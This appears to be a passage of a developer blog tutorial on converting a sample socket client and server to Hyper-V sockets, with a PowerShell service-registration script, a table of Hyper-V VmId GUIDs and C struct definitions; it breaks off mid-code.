<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This is a small article showing how to convert a simple network socket application into one that uses a Hyper-V socket for communication.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Software used</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2016 as Host;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2016 as Guest;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Visual Studio 2015 and Windows 10 as development environment.</span></div>
</li>
</ul>
<br />
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go to MSDN and read about Hyper-V Sockets (1). Note that you need Windows SDK build 10.0.14393.795 (a recent QFE for 10.0.14393.033).</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run the following PowerShell script on the host server</span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$friendlyName</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HV Socket Application"</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkgreen; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Create a new random GUID and add it to the services list then add the name as a value</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">New-Item</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Path</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; 
vertical-align: baseline;">"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices"</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Name</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ((</span><span style="background-color: transparent; color: blue; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">New-Guid</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guid)</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SetValue(</span><span style="background-color: transparent; color: darkred; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"ElementName"</span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$friendlyName</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkgreen; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Copy GUID to clipboard for later use</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Write-Host</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Service GUID: "</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PSChildName </span></div>
<br />
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Note the GUID</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Google (or wrote) application which works with Hyper-V Sockets. I get example from (2)</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We open project in Visual Studio 2015 and convert it. We see two projects in solution: Client Example and Server Example. For every project we need change Target Platform Version to 10.0.14393.0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="237" src="https://lh5.googleusercontent.com/o6EIHlZjY98chwIErZSvk8bpoDCYfRA6JsQ5Y737YnK6OijGzMdtJvKI3KFh1j9MLluDhJcGwii5zA79UW0DwSB3stVMps3OzJofMf2IFc39b-_HM_J7DRSX0M2wbPh57YW8Uho2TW0tuv7taw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="331" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MSDN article gives GUID definitions</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="208"></col><col width="208"></col><col width="208"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Name</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GUID</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Description</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_ZERO, HV_GUID_WILDCARD</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000-0000-0000-0000-000000000000</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Listeners should bind to this VmId to accept connection from all partitions.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_BROADCAST</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wildcard address for children. Listeners should bind to this VmId to accept connection from its children.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_LOOPBACK</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">e0e16197-dd56-4a10-9195-5ee7a155a838</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Loopback address. Using this VmId connects to the same partition as the connector.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_PARENT</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">a42e7cda-d03f-480c-9cc2-a4de20abb878</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Parent address. Using this VmId connects to the parent partition of the connector.*</span></div>
</td></tr>
</tbody></table>
</div>
<br />
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: -18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But not define </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">constant. Value </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">is 1</span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: -18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Now we change code in client:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: -18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1. </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: xx-small;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Add definitions:</span></span> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">struct</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR_HV</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ADDRESS_FAMILY</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Family;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">USHORT</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Reserved;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VmId;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ServiceId;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">};</span></div>
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Define GUIDs</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#include</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><combaseapi.h></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
